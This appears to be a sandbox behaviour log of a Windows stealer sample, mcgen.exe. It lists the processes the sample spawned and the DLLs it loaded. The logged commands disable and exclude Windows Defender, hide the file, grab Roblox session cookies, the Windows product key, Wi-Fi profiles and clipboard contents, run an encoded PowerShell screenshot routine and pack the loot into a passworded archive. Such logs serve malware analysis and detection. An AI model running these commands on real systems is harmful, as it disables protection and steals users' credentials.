Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\mcgen.exe""	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\mcgen.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8ED.tmp" "c:\Users\user\AppData\Local\Temp\ppw2wipr\CSC774215641B8D46CBA5382B343227E316.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
